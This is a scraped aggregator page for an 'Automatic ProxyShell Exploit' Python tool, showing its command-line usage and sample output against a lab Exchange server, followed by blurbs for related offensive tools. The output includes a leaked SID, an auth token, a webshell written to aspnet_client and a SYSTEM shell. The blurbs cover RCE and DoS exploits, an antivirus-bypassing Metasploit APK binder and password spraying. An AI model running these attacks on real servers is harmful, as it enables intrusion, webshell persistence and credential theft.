Automatic ProxyShell Exploit

Last update: Jan 05, 2023

Overview

proxyshell-auto

usage: proxyshell.py [-h] -t T

Automatic Exploit ProxyShell

optional arguments:
  -h, --help  show this help message and exit
  -t T        Exchange URL
  
Usage: 
C:\>python3 proxyshell.py -t exchange.lab.local
fqdn exchange.lab.local
+ [email protected]
legacyDN /o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=admin
leak_sid S-1-5-21-3626636094-1513906978-1376853856-1156
token VgEAVAdX[cut]AAAA==
set_ews Success with subject badqxybxtecxuttq
write webshell at aspnet_client/tjmzk.aspx
<Response [404]>
<Response [404]>
nt authority\system
SHELL>

Reference:

Owner

lulz

retarded kid try to made script for script kiddies

GitHub Repository

Evil-stalker - A simple tool written in python, it is so simple that it is based on google dorks

evil-stalker How to run First of all, you must install the necessary libraries.

6 Nov 16, 2022

带回显版本的漏洞利用脚本

CVE-2021-21978 带回显版本的漏洞利用脚本，更简单的方式 0. 漏洞信息 VMware View Planner Web管理界面存在一个上传日志功能文件的入口，没有进行认证且写入的日志文件路径用户可控，通过覆盖上传日志功能文件log_upload_wsgi.py，即可实现RCE 漏洞代码

24 Nov 09, 2022

Simple script for looping a Denial Of Service (DoS) attack over one single mac address in range

Bluetooth Simple Denial Of Service (DoS) Legal Note This project is made only for educational purposes and for helping in Proofs of Concept. The autho

1 Jan 09, 2022

You can manage your password with this program.

You must have Python compilers in order to run this program. First of all, download the compiler in the link.

6 Aug 07, 2021

The ultimate Metasploit apk binder with legit apk written in python3

Infector is a python3 based script which is officially made for linux based distro . It binds metasploit payload with original apk with avast antivirus bypassed .

27 Dec 25, 2022

Cryptick is a stock ticker for cryptocurrency tokens, and a physical NFT.

Cryptick is a stock ticker for cryptocurrency tokens, and a physical NFT. This repository includes tools and documentation for the Cryptick device.

1 Dec 31, 2021

Fuzz introspector is a tool to help fuzzer developers to get an understanding of their fuzzer’s performance and identify any potential blockers.

Fuzz introspector Fuzz introspector is a tool to help fuzzer developers to get an understanding of their fuzzer’s performance and identify any potenti

221 Jan 01, 2023

log4j2 dos exploit,CVE-2021-45105 exploit,Denial of Service poc

说明 about author: 我超怕的 blog: https://www.cnblogs.com/iAmSoScArEd/ github: https://github.com/iAmSOScArEd/ date: 2021-12-20 log4j2 dos exploit log4j2 do

3 Aug 13, 2022

This tool ability to analyze software packages of different programming languages that are being or will be used in their codes, providing information that allows them to know in advance if this library complies with processes.

This tool gives developers, researchers and companies the ability to analyze software packages of different programming languages that are being or will be used in their codes, providing information

66 Nov 08, 2022

LinOTP - the open source solution for two factor authentication

462 Jan 02, 2023

Kunyu, more efficient corporate asset collection

Kunyu(坤舆) - More efficient corporate asset collection English | 中文文档 0x00 Introduce Tool introduction Kunyu (kunyu), whose name is taken from , is act

772 Jan 05, 2023

DirBruter is a Python based CLI tool. It looks for hidden or existing directories/files using brute force method. It basically works by launching a dictionary based attack against a webserver and analyse its response.

DirBruter DirBruter is a Python based CLI tool. It looks for hidden or existing directories/files using brute force method. It basically works by laun

12 Dec 17, 2022

Automatic ProxyShell Exploit

Related tags

Overview

proxyshell-auto

Reference:

Owner

lulz

Evil-stalker - A simple tool written in python, it is so simple that it is based on google dorks

带回显版本的漏洞利用脚本

Simple script for looping a Denial Of Service (DoS) attack over one single mac address in range

You can manage your password with this program.

The ultimate Metasploit apk binder with legit apk written in python3

Cryptick is a stock ticker for cryptocurrency tokens, and a physical NFT.

Fuzz introspector is a tool to help fuzzer developers to get an understanding of their fuzzer’s performance and identify any potential blockers.

log4j2 dos exploit,CVE-2021-45105 exploit,Denial of Service poc

This tool ability to analyze software packages of different programming languages that are being or will be used in their codes, providing information that allows them to know in advance if this library complies with processes.

LinOTP - the open source solution for two factor authentication

Kunyu, more efficient corporate asset collection

DirBruter is a Python based CLI tool. It looks for hidden or existing directories/files using brute force method. It basically works by launching a dictionary based attack against a webserver and analyse its response.

Python exploit code for CVE-2021-4034 (pwnkit)

Template for new OSINT command-line tools

wsvuls - website vulnerability scanner detect issues [ outdated server software and insecure HTTP headers.]

This repo is about steps to create a effective custom wordlist in a few clicks/

DepFine Is a tool to find the unregistered dependency based on dependency confusion valunerablility and lead to RCE

Bypass's HCaptcha by overloading their api causing it to throwback a generated uuid. (Released due to exposure)

Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).

Ini membuat tema berbasis bendera Indonesia with Python + Linux.py